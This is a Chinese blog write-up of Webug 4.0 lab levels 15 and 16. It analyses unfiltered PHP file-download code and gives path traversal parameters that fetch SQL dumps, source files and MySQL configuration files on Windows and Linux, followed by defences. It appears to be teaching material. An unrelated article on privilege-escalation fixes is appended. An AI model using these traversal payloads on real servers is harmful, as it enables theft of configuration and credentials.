Webug4.0靶场通关笔记11- 第15关任意文件下载与第16关MySQL配置文件下载

#王者杯·14天创作挑战营·第1期#

目录

一、文件下载

二、第15关 任意文件下载

1.打开靶场

2.源码分析

3.渗透实战

三、第16关 MySQL配置文件下载

1.打开靶场

2.源码分析

3.渗透实战

(1)Windows系统

(2)Linux系统

四、渗透防御


一、文件下载

本文通过《webug4.0靶场第15关任意文件下载与第16关MySQL配置文件下载》来进行渗透实战。文件下载是指 Web 应用程序在处理文件下载功能时,由于代码逻辑缺陷或安全措施不足,导致用户可以非法下载服务器上的敏感文件。

二、第15关 任意文件下载

1.打开靶场

打开webug4靶场的第15关任意文件下载,完整URL地址以及页面如下所示。

http://192.168.71.1/webug4/control/filedownload/file_download.php

如上所示可以对文件进行下载,可能存在任意文件文件下载,复制txt文件的下载地址,参数为file,可以通过指定下载路径来下载文件,如下所示。

http://192.168.71.1/webug4/control/filedownload/file_download.php?file=template/assets/img/1.txt
http://192.168.71.1/webug4/control/filedownload/file_download.php?file=template/assets/img/2.txt

2.源码分析

如下所示,对参数file未做任何过滤, 直接使用fread进行处理,存在任意文件下载,如下所示filepath就是相对路径,因为是与ROOTPATH拼接而成。

<?php

require_once "../../common/common.php";
if (!isset($_SESSION['user'])) {
    header("Location:../login.php");
}
if (isset($_GET["file"])) {
    if (!empty($_GET["file"])) {
        $filePath = ROOTPATH. $_GET['file'];
        $fileName = substr($filePath, -4);
        if (file_exists($filePath)) {
            $file = fopen($filePath, 'rb');
            Header ( "Content-type: application/octet-stream" );
            Header ( "Accept-Ranges: bytes" );
            Header ( "Accept-Length: " . filesize ( $filePath ) );
            header('Content-Disposition: attachment; filename=a'.$fileName);
            echo fread ( $file, filesize ( $filePath ) );
            fclose ( $file );
            exit ();
        }

    }
}
require_once TPMELATE."/file_download.html";


3.渗透实战

如下所示,文件的下载路径相对路径的目录为template的上一层目录,也就是webug根目录。

file=template/assets/img/2.txt

考虑构造如下文件的访问路径。

构造如下相对路径。

file=sql/webug.sql
file=sql/webug_sys.sql
file=sql/webug_width_byte.sql

如下所示,渗透成功,可以进行任意文件下载。

如下所示,下载当前file_download.php文件,可以渗透成功。

file=control/filedownload/file_download.php

三、第16关 MySQL配置文件下载

1.打开靶场

打开webug4靶场的第16关任意文件下载,完整URL地址以及页面如下所示。

http://192.168.71.1/webug4/control/filedownload/ini_file_download.php

构造下载文件地址,如下所示。

http://192.168.71.1/webug4/control/filedownload/ini_file_download.php?file=template/assets/img/1.txt
http://192.168.71.1/webug4/control/filedownload/ini_file_download.php?file=template/assets/img/2.txt

2.源码分析

分析可知代码对参数file未做任何过滤, 直接使用fread进行处理,存在任意文件下载,具体如下所示。

<?php

require_once "../../common/common.php";
if (!isset($_SESSION['user'])) {
    header("Location:../login.php");
}
if (isset($_GET["file"])) {
    if (!empty($_GET["file"])) {
        $filePath = ROOTPATH. $_GET['file'];
        $fileName = substr($filePath, -4);
        if (file_exists($filePath)) {
            $file = fopen($filePath, 'rb');
            Header ( "Content-type: application/octet-stream" );
            Header ( "Accept-Ranges: bytes" );
            Header ( "Accept-Length: " . filesize ( $filePath ) );
            header('Content-Disposition: attachment; filename=a'.$fileName);
            echo fread ( $file, filesize ( $filePath ) );
            fclose ( $file );
            exit ();
        }

    }
}
require_once TPMELATE."/file_download.html";


其实这个源码与上一关完全一致,如下所示。

3.渗透实战

相对而言是需要构造MySQL的配置文件的相对路径。

(1)Windows系统

file=../../Extensions/MySQL5.7.26/my.ini

 如下所示下载了ini文件,渗透成功。

(2)Linux系统

如下所示,webug容器的mysql.ini文件的路径如下所示。

/usr/share/php5/mysql/mysql.ini

源码的根路径如下所示。

/var/www/html

相对而言mysql.ini的相对路径如下所示。

../../../usr/share/php5/mysql/mysql.ini

如下所示渗成功下载ini文件,渗透成功。

四、渗透防御

文件下载可能导致以下问题。

  • 敏感信息泄露:攻击者可利用下载包含敏感信息的文件,如用户账号密码、财务数据、企业机密文档等,进而造成信息泄露,给个人或企业带来严重损失。
  • 系统被恶意篡改:通过下载恶意文件并执行,攻击者能够篡改系统文件、配置信息等,使系统功能异常或出现安全隐患,影响系统的正常运行。
  • 植入恶意软件:下载的恶意文件可能是病毒、木马、蠕虫等恶意软件,它们会在用户设备或服务器上安装并运行,窃取数据、控制设备或发动进一步的攻击。
  • 网站被挂马:攻击者利用文件下载将恶意脚本或代码植入网站,使访问该网站的用户受到攻击,导致用户信息泄露或设备被控制。
  • 服务中断:若关键系统文件被非法下载或破坏,可能导致服务器服务中断,影响业务的正常开展,给企业带来经济损失和声誉损害。
  • 权限提升:攻击者可能通过下载特定文件,获取系统权限提升的方法,进而控制整个系统,获取更高权限的敏感信息和操作权限。

为有效预防文件下载,可从输入验证、文件存储管理、安全配置、日志监控等多个方面采取措施。

预防层面具体措施简要说明
输入验证白名单验证限定合法文件名、类型及路径,仅允许下载白名单内文件
路径验证严格校验文件路径,防止目录遍历攻击,避免直接用用户输入拼接路径
文件存储管理文件隔离将可下载文件与敏感数据分开放置,设置合理访问权限
文件名处理规范文件名,剔除特殊字符,防止恶意篡改
安全配置HTTP 头设置通过设置 Content-Disposition 等头信息,确保文件以安全方式下载
CSP 策略利用内容安全策略,限制页面资源加载来源,防范恶意文件执行
日志监控与审计日志记录记录文件下载请求相关信息,便于追溯异常行为
实时监控借助 IDS 或 IPS 实时监测,及时阻断可疑下载操作
代码管理代码审查定期检查文件下载功能代码,排查验证不严格等
安全测试运用工具与手动测试结合,全面检测潜在安全隐患
### Web 安全靶场 Webug 4.0 中越权修改密码的解决方案 在 Web 应用程序的安全测试中,“越权访问”是一种常见的漏洞,指的是未经授权的用户能够执行超出其权限范围的操作。对于 Webug 4.0 靶场中的越权修改密码场景,以下是详细的分析解决方法。 #### 背景描述 在 Webug 4.0 的设计中,存在一种典型的越权行为模式:攻击者可以通过篡改 HTTP 请求参数(如 `id` 字段),从而冒充其他用户的身份并修改目标用户的密码[^4]。这种漏洞通常源于应用程序未对操作对象的有效性和当前登录用户的权限进行严格验证。 --- #### 技术原理剖析 越权漏洞的核心原因在于服务器端缺乏有效的身份校验机制。具体表现为以下几点: 1. **请求参数未经验证** 当前用户发送的请求可能携带了非法的目标用户 ID 参数(例如 `id=0` 表示管理员)。如果服务端仅依赖前端传递的数据而未进一步确认该数据的真实性,则可能导致越权。 2. **缺少细粒度授权控制** 如果应用未能区分不同角色之间的权限边界,就容易让低权限用户获得高权限功能的使用权。 3. **会话管理不当** 即使实现了基于会话的身份认证,但如果会话状态没有绑定到具体的资源访问上下文中,也可能引发类似的越权问题。 --- #### 解决方案实现 针对上述问题,可以从以下几个方面入手来修复此漏洞: ##### 1. 强化后端逻辑校验 每次接收到涉及敏感操作(如更改密码)的请求时,应强制核对该操作是否由合法主体发起。这可通过比较当前已登录账户的信息待处理记录所属实体的一致性完成。例如,在 PHP 或 Python 后端代码中加入如下片段以确保只有本人能重置自己的密码: ```php <?php // 假设 $_SESSION['user_id'] 存储着当前登录者的唯一标识符 if ($_POST['target_user_id'] != $_SESSION['user_id']) { die('Access Denied'); // 若两者不符则拒绝继续运行后续脚本 } ?> ``` 或者采用更现代化的语言框架编写类似防护措施: ```python from flask import session, request, abort def change_password(): target_user_id = int(request.form.get('target_user_id')) current_user_id = session.get('user_id') if target_user_id != current_user_id: abort(403) # 返回HTTP Forbidden响应码表示无权访问 # 正常业务流程... ``` 以上两段伪代码均体现了只允许用户对自己账号实施特定变更的原则。 ##### 2. 实施严格的 RBAC (Role-Based Access Control) 引入基于角色的访问控制系统有助于细化各类人员所能触及的功能模块及其内部细节。通过预先定义好的策略组合判定谁可以在何时何地做什么事情,进而减少因疏忽造成的安全隐患。 例如,在 MySQL 数据库表结构层面增加字段用于标记每条记录联的角色类别,并据此调整查询语句条件部分的内容以便筛选出符合条件的结果集之前先过滤掉不符合要求的部分。 ##### 3. 利用 CSRF Token 提升安全性 为了防止恶意站点诱导受害者提交伪造跨站请求(CSRF),建议结合随机生成且难以预测的一次性令牌(Token)一同嵌入至 HTML 表单之中并对应 Session 绑定起来共同参最终判断过程。这样即使黑客截获到了原始 POST 请求也无法轻易复制粘贴成功模拟真实交互动作。 --- #### 总结说明 综上所述,要彻底杜绝此类越权现象的发生除了加强开发阶段的设计考量之外还需要持续注最新威胁情报动态及时修补发现的新缺陷。同时也要提醒广大开发者时刻牢记安全第一的理念贯穿整个软件开发生命周期始终。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

mooyuan天天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值